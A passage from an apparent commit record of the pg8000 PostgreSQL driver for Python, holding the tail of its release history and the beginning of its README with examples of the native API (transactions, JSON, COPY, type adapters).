password connection parameter\n correctly. Now it's handled in the same way as the 'user' and 'database'\n parameters, ie. if the password is bytes, then pass it straight through to the\n database, if it's a string then encode it with utf8.\n\n* It used to be that if the 'user' parameter to the connection function was\n 'None', then pg8000 would try and look at environment variables to find a\n username. Now we just go by the 'user' parameter only, and give an error if\n it's None.\n\n\n=== Version 1.10.5, 2016-03-04\n\n- Include LICENCE text and sources for docs in the source distribution (the\n tarball).\n\n\n=== Version 1.10.4, 2016-02-27\n\n* Fixed bug where if a str is sent as a query parameter, and then with the same\n cursor an int is sent instead of a string, for the same query, then it fails.\n\n* Under Python 2, a str type is now sent 'as is', ie. as a byte string rather\n than trying to decode and send according to the client encoding. Under Python\n 2 it's recommended to send text as unicode() objects.\n\n* Dropped and added support for Python versions. Now pg8000 supports\n Python 2.7+ and Python 3.3+.\n\n* Dropped and added support for PostgreSQL versions. Now pg8000 supports\n PostgreSQL 9.1+.\n\n* pg8000 uses the 'six' library for making the same code run on both Python 2\n and Python 3. We used to include it as a file in the pg8000 source code. Now\n we have it as a separate dependency that's installed with 'pip install'. The\n reason for doing this is that package maintainers for OS distributions\n prefer unbundled libaries.\n\n\n=== Version 1.10.3, 2016-01-07\n\n* Removed testing for PostgreSQL 9.0 as it's not longer supported by the\n PostgreSQL Global Development Group.\n* Fixed bug where pg8000 would fail with datetimes if PostgreSQL was compiled\n with the integer_datetimes option set to 'off'. The bug was in the\n timestamp_send_float function.\n\n\n=== Version 1.10.2, 2015-03-17\n\n* If there's a socket exception thrown when communicating with the database,\n it is now wrapped in an OperationalError exception, to conform to the DB-API\n spec.\n\n* Previously, pg8000 didn't recognize the EmptyQueryResponse (that the server\n sends back if the SQL query is an empty string) now we raise a\n ProgrammingError exception.\n\n* Added socket timeout option for Python 3.\n\n* If the server returns an error, we used to initialize the ProgramerException\n with just the first three fields of the error. Now we initialize the\n ProgrammerException with all the fields.\n\n* Use relative imports inside package.\n\n* User and database names given as bytes. The user and database parameters of\n the connect() function are now passed directly as bytes to the server. If the\n type of the parameter is unicode, pg8000 converts it to bytes using the uft8\n encoding.\n\n* Added support for JSON and JSONB Postgres types. We take the approach of\n taking serialized JSON (str) as an SQL parameter, but returning results as\n de-serialized JSON (Python objects). See the example in the Quickstart.\n\n* Added CircleCI continuous integration.\n\n* String support in arrays now allow letters like \"u\", braces and whitespace.\n\n\n=== Version 1.10.1, 2014-09-15\n\n* Add support for the Wheel package format.\n\n* Remove option to set a connection timeout. For communicating with the server,\n pg8000 uses a file-like object using socket.makefile() but you can't use this\n if the underlying socket has a timeout.\n\n\n=== Version 1.10.0, 2014-08-30\n\n* Remove the old ``pg8000.dbapi`` and ``pg8000.DBAPI`` namespaces. For example,\n now only ``pg8000.connect()`` will work, and ``pg8000.dbapi.connect()``\n won't work any more.\n\n* Parse server version string with LooseVersion. This should solve the problems\n that people have been having when using versions of PostgreSQL such as\n ``9.4beta2``.\n\n* Message if portal suspended in autocommit. Give a proper error message if the\n portal is suspended while in autocommit mode. The error is that the portal is\n closed when the transaction is closed, and so in autocommit mode the portal\n will be immediately closed. The bottom line is, don't use autocommit mode if\n there's a chance of retrieving more rows than the cache holds (currently 100).\n\n\n=== Version 1.9.14, 2014-08-02\n\n* Make ``executemany()`` set ``rowcount``. Previously, ``executemany()`` would\n always set ``rowcount`` to -1. Now we set it to a meaningful value if\n possible. If any of the statements have a -1 ``rowcount`` then then the\n ``rowcount`` for the ``executemany()`` is -1, otherwise the ``executemany()``\n ``rowcount`` is the sum of the rowcounts of the individual statements.\n\n* Support for password authentication. pg8000 didn't support plain text\n authentication, now it does.\n\n\n=== Version 1.9.13, 2014-07-27\n\n* Reverted to using the string ``connection is closed`` as the message of the\n exception that's thrown if a connection is closed. For a few versions we were\n using a slightly different one with capitalization and punctuation, but we've\n reverted to the original because it's easier for users of the library to\n consume.\n\n* Previously, ``tpc_recover()`` would start a transaction if one was not already\n in progress. Now it won't.\n\n\n=== Version 1.9.12, 2014-07-22\n\n* Fixed bug in ``tpc_commit()`` where a single phase commit failed.\n\n\n=== Version 1.9.11, 2014-07-20\n\n* Add support for two-phase commit DBAPI extension. Thanks to Mariano Reingart's\n TPC code on the Google Code version:\n\n https:\/\/code.google.com\/p\/pg8000\/source\/detail?r=c8609701b348b1812c418e2c7\n\n on which the code for this commit is based.\n\n* Deprecate ``copy_from()`` and ``copy_to()`` The methods ``copy_from()`` and\n ``copy_to()`` of the ``Cursor`` object are deprecated because it's simpler and\n more flexible to use the ``execute()`` method with a ``fileobj`` parameter.\n\n* Fixed bug in reporting unsupported authentication codes. Thanks to\n https:\/\/github.com\/hackgnar for reporting this and providing the fix.\n\n* Have a default for the ``user`` paramater of the ``connect()`` function. If\n the ``user`` parameter of the ``connect()`` function isn't provided, look\n first for the ``PGUSER`` then the ``USER`` environment variables. Thanks to\n Alex Gaynor https:\/\/github.com\/alex for this suggestion.\n\n* Before PostgreSQL 8.2, ``COPY`` didn't give row count. Until PostgreSQL 8.2\n (which includes Amazon Redshift which forked at 8.0) the ``COPY`` command\n didn't return a row count, but pg8000 thought it did. That's fixed now.\n\n\n=== Version 1.9.10, 2014-06-08\n\n* Remember prepared statements. Now prepared statements are never closed, and\n pg8000 remembers which ones are on the server, and uses them when a query is\n repeated. This gives an increase in performance, because on subsequent\n queries the prepared statement doesn't need to be created each time.\n\n* For performance reasons, pg8000 never closed portals explicitly, it just\n let the server close them at the end of the transaction. However, this can\n cause memory problems for long running transactions, so now pg800 always\n closes a portal after it's exhausted.\n\n* Fixed bug where unicode arrays failed under Python 2. Thanks to\n https:\/\/github.com\/jdkx for reporting this.\n\n* A FLUSH message is now sent after every message (except SYNC). This is in\n accordance with the protocol docs, and ensures the server sends back its\n responses straight away.\n\n\n=== Version 1.9.9, 2014-05-12\n\n* The PostgreSQL interval type is now mapped to datetime.timedelta where\n possible. Previously the PostgreSQL interval type was always mapped to the\n pg8000.Interval type. However, to support the datetime.timedelta type we\n now use it whenever possible. Unfortunately it's not always possible because\n timedelta doesn't support months. If months are needed then the fall-back\n is the pg8000.Interval type. This approach means we handle timedelta in a\n similar way to other Python PostgreSQL drivers, and it makes pg8000\n compatible with popular ORMs like SQLAlchemy.\n\n* Fixed bug in executemany() where a new prepared statement should be created\n for each variation in the oids of the parameter sets.\n\n\n=== Version 1.9.8, 2014-05-05\n\n* We used to ask the server for a description of the statement, and then ask\n for a description of each subsequent portal. We now only ask for a\n description of the statement. This results in a significant performance\n improvement, especially for executemany() calls and when using the\n 'use_cache' option of the connect() function.\n\n* Fixed warning in Python 3.4 which was saying that a socket hadn't been\n closed. It seems that closing a socket file doesn't close the underlying\n socket.\n\n* Now should cope with PostgreSQL 8 versions before 8.4. This includes Amazon\n Redshift.\n\n* Added 'unicode' alias for 'utf-8', which is needed for Amazon Redshift.\n\n* Various other bug fixes.\n\n\n=== Version 1.9.7, 2014-03-26\n\n* Caching of prepared statements. There's now a 'use_cache' boolean parameter\n for the connect() function, which causes all prepared statements to be cached\n by pg8000, keyed on the SQL query string. This should speed things up\n significantly in most cases.\n\n* Added support for the PostgreSQL inet type. It maps to the Python types\n IPv*Address and IPv*Network.\n\n* Added support for PostgreSQL +\/- infinity date and timestamp values. Now the\n Python value datetime.datetime.max maps to the PostgreSQL value 'infinity'\n and datetime.datetime.min maps to '-infinity', and the same for\n datetime.date.\n\n* Added support for the PostgreSQL types int2vector and xid, which are mostly\n used internally by PostgreSQL.\n\n\n=== Version 1.9.6, 2014-02-26\n\n* Fixed a bug where 'portal does not exist' errors were being generated. Some\n queries that should have been run in a transaction were run in autocommit\n mode and so any that suspended a portal had the portal immediately closed,\n because a portal can only exist within a transaction. This has been solved by\n determining the transaction status from the READY_FOR_QUERY message.\n\n\n=== Version 1.9.5, 2014-02-15\n\n* Removed warn() calls for __next__() and __iter__(). Removing the warn() in\n __next__() improves the performance tests by ~20%.\n\n* Increased performance of timestamp by ~20%. Should also improve timestamptz.\n\n* Moved statement_number and portal_number from module to Connection. This\n should reduce lock contention for cases where there's a single module and\n lots of connections.\n\n* Make decimal_out\/in and time_in use client_encoding. These functions used to\n assume ascii, and I can't think of a case where that wouldn't work.\n Nonetheless, that theoretical bug is now fixed.\n\n* Fixed a bug in cursor.executemany(), where a non-None parameter in a sequence\n of parameters, is None in a subsequent sequence of parameters.\n\n\n=== Version 1.9.4, 2014-01-18\n\n* Fixed a bug where with Python 2, a parameter with the value Decimal('12.44'),\n (and probably other numbers) isn't sent correctly to PostgreSQL, and so the\n command fails. This has been fixed by sending decimal types as text rather\n than binary. I'd imagine it's slightly faster too.\n\n\n=== Version 1.9.3, 2014-01-16\n\n* Fixed bug where there were missing trailing zeros after the decimal point in\n the NUMERIC type. For example, the NUMERIC value 1.0 was returned as 1 (with\n no zero after the decimal point).\n\n This is fixed this by making pg8000 use the text rather than binary\n representation for the numeric type. This actually doubles the speed of\n numeric queries.\n\n\n=== Version 1.9.2, 2013-12-17\n\n* Fixed incompatibility with PostgreSQL 8.4. In 8.4, the CommandComplete\n message doesn't return a row count if the command is SELECT. We now look at\n the server version and don't look for a row count for a SELECT with version\n 8.4.\n\n\n=== Version 1.9.1, 2013-12-15\n\n* Fixed bug where the Python 2 'unicode' type wasn't recognized in a query\n parameter.\n\n\n=== Version 1.9.0, 2013-12-01\n\n* For Python 3, the :class:`bytes` type replaces the :class:`pg8000.Bytea`\n type. For backward compatibility the :class:`pg8000.Bytea` still works under\n Python 3, but its use is deprecated.\n\n* A single codebase for Python 2 and 3.\n\n* Everything (functions, properties, classes) is now available under the\n ``pg8000`` namespace. So for example:\n\n * pg8000.DBAPI.connect() -> pg8000.connect()\n * pg8000.DBAPI.apilevel -> pg8000.apilevel\n * pg8000.DBAPI.threadsafety -> pg8000.threadsafety\n * pg8000.DBAPI.paramstyle -> pg8000.paramstyle\n * pg8000.types.Bytea -> pg8000.Bytea\n * pg8000.types.Interval -> pg8000.Interval\n * pg8000.errors.Warning -> pg8000.Warning\n * pg8000.errors.Error -> pg8000.Error\n * pg8000.errors.InterfaceError -> pg8000.InterfaceError\n * pg8000.errors.DatabaseError -> pg8000.DatabaseError\n\n The old locations are deprecated, but still work for backward compatibility.\n\n* Lots of performance improvements.\n\n * Faster receiving of ``numeric`` types.\n * Query only parsed when PreparedStatement is created.\n * PreparedStatement re-used in executemany()\n * Use ``collections.deque`` rather than ``list`` for the row cache. We're\n adding to one end and removing from the other. This is O(n) for a list but\n O(1) for a deque.\n * Find the conversion function and do the format code check in the\n ROW_DESCRIPTION handler, rather than every time in the ROW_DATA handler.\n * Use the 'unpack_from' form of struct, when unpacking the data row, so we\n don't have to slice the data.\n * Return row as a list for better performance. At the moment result rows are\n turned into a tuple before being returned. Returning the rows directly as a\n list speeds up the performance tests about 5%.\n * Simplify the event loop. Now the main event loop just continues until a\n READY_FOR_QUERY message is received. This follows the suggestion in the\n Postgres protocol docs. There's not much of a difference in speed, but the\n code is a bit simpler, and it should make things more robust.\n * Re-arrange the code as a state machine to give > 30% speedup.\n * Using pre-compiled struct objects. Pre-compiled struct objects are a bit\n faster than using the struct functions directly. It also hopefully adds to\n the readability of the code.\n * Speeded up _send. Before calling the socket 'write' method, we were\n checking that the 'data' type implements the 'buffer' interface (bytes or\n bytearray), but the check isn't needed because 'write' raises an exception\n if data is of the wrong type.\n\n\n* Add facility for turning auto-commit on. This follows the suggestion of\n funkybob to fix the problem of not be able to execute a command such as\n 'create database' that must be executed outside a transaction. Now you can do\n conn.autocommit = True and then execute 'create database'.\n\n* Add support for the PostgreSQL ``uid`` type. Thanks to Rad Cirskis.\n\n* Add support for the PostgreSQL XML type.\n\n* Add support for the PostgreSQL ``enum`` user defined types.\n\n* Fix a socket leak, where a problem opening a connection could leave a socket\n open.\n\n* Fix empty array issue. https:\/\/github.com\/mfenniak\/pg8000\/issues\/10\n\n* Fix scale on ``numeric`` types. https:\/\/github.com\/mfenniak\/pg8000\/pull\/13\n\n* Fix numeric_send. Thanks to Christian Hofstaedtler.\n\n\n=== Version 1.08, 2010-06-08\n\n* Removed usage of deprecated :mod:`md5` module, replaced with :mod:`hashlib`.\n Thanks to Gavin Sherry for the patch.\n\n* Start transactions on execute or executemany, rather than immediately at the\n end of previous transaction. Thanks to Ben Moran for the patch.\n\n* Add encoding lookups where needed, to address usage of SQL_ASCII encoding.\n Thanks to Benjamin Schweizer for the patch.\n\n* Remove record type cache SQL query on every new pg8000 connection.\n\n* Fix and test SSL connections.\n\n* Handle out-of-band messages during authentication.\n\n\n=== Version 1.07, 2009-01-06\n\n* Added support for :meth:`~pg8000.dbapi.CursorWrapper.copy_to` and\n :meth:`~pg8000.dbapi.CursorWrapper.copy_from` methods on cursor objects, to\n allow the usage of the PostgreSQL COPY queries. Thanks to Bob Ippolito for\n the original patch.\n\n* Added the :attr:`~pg8000.dbapi.ConnectionWrapper.notifies` and\n :attr:`~pg8000.dbapi.ConnectionWrapper.notifies_lock` attributes to DBAPI\n connection objects to provide access to server-side event notifications.\n Thanks again to Bob Ippolito for the original patch.\n\n* Improved performance using buffered socket I\/O.\n\n* Added valid range checks for :class:`~pg8000.types.Interval` attributes.\n\n* Added binary transmission of :class:`~decimal.Decimal` values. This permits\n full support for NUMERIC[] types, both send and receive.\n\n* New `Sphinx <http:\/\/sphinx.pocoo.org\/>`_-based website and documentation.\n\n\n=== Version 1.06, 2008-12-09\n\n* pg8000-py3: a branch of pg8000 fully supporting Python 3.0.\n\n* New Sphinx-based documentation.\n\n* Support for PostgreSQL array types -- INT2[], INT4[], INT8[], FLOAT[],\n DOUBLE[], BOOL[], and TEXT[]. New support permits both sending and\n receiving these values.\n\n* Limited support for receiving RECORD types. If a record type is received,\n it will be translated into a Python dict object.\n\n* Fixed potential threading bug where the socket lock could be lost during\n error handling.\n\n\n=== Version 1.05, 2008-09-03\n\n* Proper support for timestamptz field type:\n\n * Reading a timestamptz field results in a datetime.datetime instance that\n has a valid tzinfo property. tzinfo is always UTC.\n\n * Sending a datetime.datetime instance with a tzinfo value will be\n sent as a timestamptz type, with the appropriate tz conversions done.\n\n* Map postgres < -- > python text encodings correctly.\n\n* Fix bug where underscores were not permitted in pyformat names.\n\n* Support \"%s\" in a pyformat strin.\n\n* Add cursor.connection DB-API extension.\n\n* Add cursor.next and cursor.__iter__ DB-API extensions.\n\n* DBAPI documentation improvements.\n\n* Don't attempt rollback in cursor.execute if a ConnectionClosedError occurs.\n\n* Add warning for accessing exceptions as attributes on the connection object,\n as per DB-API spec.\n\n* Fix up open connection when an unexpected connection occurs, rather than\n leaving the connection in an unusable state.\n\n* Use setuptools\/egg package format.\n\n\n=== Version 1.04, 2008-05-12\n\n* DBAPI 2.0 compatibility:\n\n * rowcount returns rows affected when appropriate (eg. UPDATE, DELETE)\n\n * Fix CursorWrapper.description to return a 7 element tuple, as per spec.\n\n * Fix CursorWrapper.rowcount when using executemany.\n\n * Fix CursorWrapper.fetchmany to return an empty sequence when no more\n results are available.\n\n * Add access to DBAPI exceptions through connection properties.\n\n * Raise exception on closing a closed connection.\n\n * Change DBAPI.STRING to varchar type.\n\n * rowcount returns -1 when appropriate.\n\n * DBAPI implementation now passes Stuart Bishop's Python DB API 2.0 Anal\n Compliance Unit Test.\n\n* Make interface.Cursor class use unnamed prepared statement that binds to\n parameter value types. This change increases the accuracy of PG's query\n plans by including parameter information, hence increasing performance in\n some scenarios.\n\n* Raise exception when reading from a cursor without a result set.\n\n* Fix bug where a parse error may have rendered a connection unusable.\n\n\n=== Version 1.03, 2008-05-09\n\n* Separate pg8000.py into multiple python modules within the pg8000 package.\n There should be no need for a client to change how pg8000 is imported.\n\n* Fix bug in row_description property when query has not been completed.\n\n* Fix bug in fetchmany dbapi method that did not properly deal with the end of\n result sets.\n\n* Add close methods to DB connections.\n\n* Add callback event handlers for server notices, notifications, and runtime\n configuration changes.\n\n* Add boolean type output.\n\n* Add date, time, and timestamp types in\/out.\n\n* Add recognition of \"SQL_ASCII\" client encoding, which maps to Python's\n \"ascii\" encoding.\n\n* Add types.Interval class to represent PostgreSQL's interval data type, and\n appropriate wire send\/receive methods.\n\n* Remove unused type conversion methods.\n\n\n=== Version 1.02, 2007-03-13\n\n* Add complete DB-API 2.0 interface.\n\n* Add basic SSL support via ssl connect bool.\n\n* Rewrite pg8000_test.py to use Python's unittest library.\n\n* Add bytea type support.\n\n* Add support for parameter output types: NULL value, timestamp value, python\n long value.\n\n* Add support for input parameter type oid.\n\n\n=== Version 1.01, 2007-03-09\n\n* Add support for writing floats and decimal objs up to PG backend.\n\n* Add new error handling code and tests to make sure connection can recover\n from a database error.\n\n* Fixed bug where timestamp types were not always returned in the same binary\n format from the PG backend. Text format is now being used to send\n timestamps.\n\n* Fixed bug where large packets from the server were not being read fully, due\n to socket.read not always returning full read size requested. It was a\n lazy-coding bug.\n\n* Added locks to make most of the library thread-safe.\n\n* Added UNIX socket support.\n\n\n=== Version 1.00, 2007-03-08\n\n* First public release. Although fully functional, this release is mostly\n lacking in production testing and in type support.\n","old_contents":"= pg8000\n:toc: preamble\n\npg8000 is a pure-link:http:\/\/www.python.org\/[Python]\nhttp:\/\/www.postgresql.org\/[PostgreSQL] driver that complies with\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DB-API 2.0]. It is tested on Python\nversions 3.6+, on CPython and PyPy, and PostgreSQL versions 9.5+.\npg8000's name comes from the belief that it is probably about the 8000th\nPostgreSQL interface for Python. pg8000 is distributed under the BSD 3-clause\nlicense.\n\nAll bug reports, feature requests and contributions are welcome at\nhttp:\/\/github.com\/tlocke\/pg8000\/.\n\nimage::https:\/\/github.com\/tlocke\/pg8000\/workflows\/pg8000\/badge.svg[Build Status]\n\n\n== Installation\n\nTo install pg8000 using `pip` type:\n\n`pip install pg8000`\n\n\n== Native API Interactive Examples\n\npg8000 comes with two APIs, the native pg8000 API and the DB-API 2.0 standard\nAPI. These are the examples for the native API, and the DB-API 2.0 examples\nfollow in the next section.\n\n\n=== Basic Example\n\nImport pg8000, connect to the database, create a table, add some rows and then\nquery the table:\n\n[source,python]\n----\n>>> import pg8000.native\n>>>\n>>> # Connect to the database with user name postgres\n>>>\n>>> con = pg8000.native.Connection(\"postgres\", password=\"cpsnow\")\n>>>\n>>> # Create a temporary table\n>>>\n>>> con.run(\"CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)\")\n[]\n>>>\n>>> # Populate the table\n>>>\n>>> for title in (\"Ender's Game\", \"The Magus\"):\n... con.run(\"INSERT INTO book (title) VALUES (:title)\", title=title)\n[]\n[]\n>>>\n>>> # Print all the rows in the table\n>>>\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n\n----\n\n\n=== Transactions\n\nHere's how to run groups of SQL statements in a\nhttps:\/\/www.postgresql.org\/docs\/current\/tutorial-transactions.html[transaction]:\n\n----\n>>> con.run(\"START TRANSACTION\")\n[]\n>>> con.run(\"INSERT INTO book (title) VALUES (:title)\", title=\"Phineas Finn\") \n[]\n>>> con.run(\"COMMIT\")\n[]\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n[3, 'Phineas Finn']\n\n----\n\nrolling back a transaction:\n\n----\n>>> con.run(\"START TRANSACTION\")\n[]\n>>> con.run(\"DELETE FROM book WHERE title = :title\", title=\"Phineas Finn\") \n[]\n>>> con.run(\"ROLLBACK\")\n[]\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n[3, 'Phineas Finn']\n\n----\n\n\n=== Query Using Fuctions\n\nAnother query, using some PostgreSQL functions:\n\n[source,python]\n----\n>>> con.run(\"SELECT extract(millennium from now())\")\n[[3.0]]\n\n----\n\n\n=== Interval Type\n\nA query that returns the PostgreSQL interval type:\n\n[source,python]\n----\n>>> import datetime\n>>>\n>>> ts = datetime.date(1980, 4, 27)\n>>> con.run(\"SELECT timestamp '2013-12-01 16:06' - :ts\", ts=ts)\n[[datetime.timedelta(days=12271, seconds=57960)]]\n\n----\n\n\n=== Point Type\n\nA round-trip with a\nhttps:\/\/www.postgresql.org\/docs\/current\/datatype-geometric.html[PostgreSQL\npoint] type:\n\n[source,python]\n----\n>>> con.run(\"SELECT CAST(:pt as point)\", pt='(2.3,1)')\n[['(2.3,1)']]\n\n----\n\n\n=== Client Encoding\n\nWhen communicating with the server, pg8000 uses the character set that the\nserver asks it to use (the client encoding). By default the client encoding is\nthe database's character set (chosen when the database is created), but the\nclient encoding can be changed in a number of ways (eg. setting\nCLIENT_ENCODING in postgresql.conf). Another way of changing the client\nencoding is by using an SQL command. For example:\n\n[source,python]\n----\n>>> con.run(\"SET CLIENT_ENCODING TO 'UTF8'\")\n[]\n>>> con.run(\"SHOW CLIENT_ENCODING\")\n[['UTF8']]\n\n----\n\n\n=== JSONB and JSON\n\nJSONB (and JSON) always comes back from the server de-serialized. If the JSON\nyou want to send is a `dict` then you can just do:\n\n[source,python]\n----\n>>> import json\n>>> val = {'name': 'Apollo 11 Cave', 'zebra': True, 'age': 26.003}\n>>> con.run(\"SELECT :apollo\", apollo=val)\n[[{'age': 26.003, 'name': 'Apollo 11 Cave', 'zebra': True}]]\n\n----\n\nJSON can always be sent in serialized form to the server:\n\n[source,python]\n----\n>>> import json\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> con.run(\"SELECT CAST(:apollo as json)\", apollo=json.dumps(val))\n[[['Apollo 11 Cave', True, 26.003]]]\n\n----\n\n\n=== Retrieve Column Metadata From Results\n\nFind the column metadata returned from a query:\n\n[source,python]\n----\n>>> con.run(\"create temporary table quark (id serial, name text)\")\n[]\n>>> for name in ('Up', 'Down'):\n... con.run(\"INSERT INTO quark (name) VALUES (:name)\", name=name)\n[]\n[]\n>>> # Now execute the query\n>>>\n>>> con.run(\"SELECT * FROM quark\")\n[[1, 'Up'], [2, 'Down']]\n>>>\n>>> # and retried the metadata\n>>>\n>>> con.columns\n[{'table_oid': ..., 'column_attrnum': 1, 'type_oid': 23, 'type_size': 4, 'type_modifier': -1, 'format': 0, 'name': 'id'}, {'table_oid': ..., 'column_attrnum': 2, 'type_oid': 25, 'type_size': -1, 'type_modifier': -1, 'format': 0, 'name': 'name'}]\n>>>\n>>> # Show just the column names\n>>>\n>>> [c['name'] for c in con.columns]\n['id', 'name']\n\n----\n\n\n=== Notices And Notifications\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> con.run(\"LISTEN aliens_landed\")\n[]\n>>> con.run(\"NOTIFY aliens_landed\")\n[]\n>>> # A notification is a tuple containing (backend_pid, channel, payload)\n>>>\n>>> con.notifications[0]\n(..., 'aliens_landed', '')\n\n----\n\n\n=== LIMIT ALL\n\nYou might think that the following would work, but in fact it fails:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim='ALL')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nInstead the https:\/\/www.postgresql.org\/docs\/current\/sql-select.html[docs say]\nthat you can send `null` as an alternative to `ALL`, which does work:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim=None)\n[['silo 1']]\n\n----\n\n\n=== IN and NOT IN\n\nYou might think that the following would work, but in fact the server doesn't\nlike it:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN :v\", v=('a', 'b'))\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\ninstead you can write it using the\nhttps:\/\/www.postgresql.org\/docs\/current\/functions-array.html[`unnest`]\nfunction:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN (SELECT unnest(:v))\", v=('a', 'b'))\n[['silo 1']]\n\n----\n\nand you can do the same for `NOT IN`.\n\n\n=== Many SQL Statements Can't Be Parameterized\n\nIn PostgreSQL parameters can only be used for\nhttps:\/\/www.postgresql.org\/docs\/current\/xfunc-sql.html#XFUNC-SQL-FUNCTION-ARGUMENTS[data values, not identifiers]. Sometimes this might not work as expected,\nfor example the following fails:\n\n[source,python]\n----\n>>> con.run(\"CREATE USER juan WITH PASSWORD :password\", password='quail')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nIt fails because the PostgreSQL server doesn't allow this statement to have\nany parameters. There are many SQL statements that one might think would have\nparameters, but don't.\n\n\n=== COPY from and to a file\n\nThe SQL https:\/\/www.postgresql.org\/docs\/current\/sql-copy.html[COPY] statement\ncan be used to copy from and to a file or file-like object. Here' an example\nusing the CSV format:\n\n[source,python]\n----\n\n>>> from io import BytesIO\n>>> import csv\n>>> import codecs\n>>>\n>>> # Create a CSV file in memory\n>>>\n>>> stream_in = BytesIO()\n>>> StreamWriter = codecs.getwriter('utf-8')\n>>> csv_writer = csv.writer(StreamWriter(stream_in))\n>>> csv_writer.writerow([1, \"electron\"])\n>>> csv_writer.writerow([2, \"muon\"])\n>>> csv_writer.writerow([3, \"tau\"])\n>>> stream_in.seek(0)\n0\n>>>\n>>> # Create a table and then copy the CSV into it\n>>>\n>>> con.run(\"CREATE TEMPORARY TABLE lepton (id SERIAL, name TEXT)\")\n[]\n>>> con.run(\"COPY lepton FROM STDIN WITH (FORMAT CSV)\", stream=stream_in)\n[]\n>>>\n>>> # COPY from a table to a stream\n>>>\n>>> stream_out = BytesIO()\n>>> con.run(\"COPY lepton TO STDOUT WITH (FORMAT CSV)\", stream=stream_out)\n[]\n>>> stream_out.seek(0)\n0\n>>> StreamReader = codecs.getreader('utf-8')\n>>> for row in csv.reader(StreamReader(stream_out)):\n... print(row)\n['1', 'electron']\n['2', 'muon']\n['3', 'tau']\n\n----\n\n\n=== Execute Multiple SQL Statements\n\nIf you want to execute a series of SQL statements (eg. an `.sql` file), you\ncan run them as expected:\n\n[source,python]\n----\n\n>>> statements = \"SELECT 5; SELECT 'Erich Fromm';\"\n>>>\n>>> con.run(statements)\n[[5], ['Erich Fromm']]\n\n----\n\nThe only caveat is that when executing multiple statements you can't have any\nparameters.\n\n\n=== Quoted Identifiers in SQL\n\nSay you had a column called `My Column`. Since it's case sensitive and\ncontains a space, you'd have to\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERSdouble[surround it by double quotes]. But you can't do:\n\n[source,python]\n----\n>>> con.run(\"select 'hello' as \"My Column\"\")\nTraceback (most recent call last):\nSyntaxError: invalid syntax\n\n----\n\nsince Python uses double quotes to delimit string literals, so one solution is\nto use Python's\nhttps:\/\/docs.python.org\/3\/tutorial\/introduction.html#strings[triple quotes]\nto delimit the string instead:\n\n[source,python]\n----\n>>> con.run('''select 'hello' as \"My Column\"''')\n[['hello']]\n\n----\n\n\n=== Custom adapter from a Python type to a PostgreSQL type\n\npg8000 has a mapping from Python types to PostgreSQL types for when it needs\nto send SQL parameters to the server. The default mapping that comes with\npg8000 is designed to work well in most cases, but you might want to add or\nreplace the default mapping.\n\nA Python `datetime.timedelta` object is sent to the server as a PostgreSQL\n`interval` type, which has the `oid` 1186. But let's say we wanted to create\nour own Python class to be sent as an `interval` type. Then we'd have to\nregister an adapter:\n\n[source,python]\n----\n\n>>> class MyInterval(str):\n... pass\n>>>\n>>> def my_interval_out(my_interval):\n... return my_interval # Must return a str\n>>>\n>>> con.register_out_adapter(MyInterval, 1186, my_interval_out)\n>>> con.run(\"SELECT :interval\", interval=MyInterval(\"2 hours\"))\n[[datetime.timedelta(seconds=7200)]]\n\n----\n\nNote that it still came back as a `datetime.timedelta` object because we only\nchanged the mapping from Python to PostgreSQL. See below for an example of how\nto change the mapping from PostgreSQL to Python.\n\n\n=== Custom adapter from a PostgreSQL type to a Python type\n\npg8000 has a mapping from PostgreSQL types to Python types for when it receives\nSQL results from the server. The default mapping that comes with pg8000 is\ndesigned to work well in most cases, but you might want to add or replace the\ndefault mapping.\n\nIf pg800 recieves PostgreSQL `interval` type, which has the `oid` 1186, it\nconverts it into a Python `datetime.timedelta` object. But let's say we wanted\nto create our own Python class to be used instead of `datetime.timedelta`. Then\nwe'd have to register an adapter:\n\n\n[source,python]\n----\n\n>>> class MyInterval(str):\n... pass\n>>>\n>>> def my_interval_in(my_interval_str): # The parameter is of type str\n... return MyInterval(my_interval)\n>>>\n>>> con.register_in_adapter(1186, my_interval_in)\n>>> con.run(\"SELECT \\'2 years'\")\n[['2 years']]\n\n----\n\nNote that registering the 'in' adapter only afects the mapping from the\nPostgreSQL type to the Python type. See above for an example of how to change\nthe mapping from PostgreSQL to Python.\n\n\n=== Could Not Determine Data Type Of Parameter\n\nSometimes you'll get the 'could not determine data type of parameter' error\nmessage from the server:\n\n[source,python]\n----\n\n>>> con.run(\"SELECT :v IS NULL\", v=None)\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: {'S': 'ERROR', 'V': 'ERROR', 'C': '42P18', 'M': 'could not determine data type of parameter $1', 'F': 'postgres.c', 'L': '...', 'R': 'exec_parse_message'}\n\n----\n\nOne way of solving it is to put a `cast` in the SQL:\n\n[source,python]\n----\n\n>>> con.run(\"SELECT cast(:v as TIMESTAMP) IS NULL\", v=None)\n[[True]]\n\n----\n\nAnother way is to override the type that pg8000 sends along with each\nparameter:\n\n[source,python]\n----\n\n>>> con.run(\"SELECT :v IS NULL\", v=None, types={'v': 